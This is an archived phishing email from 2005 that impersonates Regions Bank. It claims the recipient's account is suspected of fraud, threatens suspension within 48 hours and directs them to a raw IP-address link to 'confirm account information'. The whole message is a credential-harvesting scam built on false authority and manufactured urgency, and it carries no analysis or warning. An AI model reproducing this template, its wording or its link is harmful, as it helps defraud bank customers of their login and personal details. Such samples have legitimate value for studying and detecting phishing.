ddd

Regions Notice

From: Regions Bank
Subject: Regions Notice
Date: Sat, 26 Mar 2005 02:07:47 -0800

Dear address@hidden,

In order to maintain the safety and integrity of our Regions Bank
community, we have issued the following warning.
It came to our attention that your account may be suspected of fraud.
We ask our users with exposed accounts to confirm their identity with
Regions
every once in a while, in order to upkeep the safety of our
environment.
If the submitted information will fail to match our records for three
times, your account will be suspended until further notice.
If you will fail to confirm your identity within the next 48 hours,
your account will
be suspended until further notice.

Please follow the link below and confirm your account information:
http://200.15.162.13/images/main/.p/reg/index.html

Thanks!
Regions Bank services
Member FDIC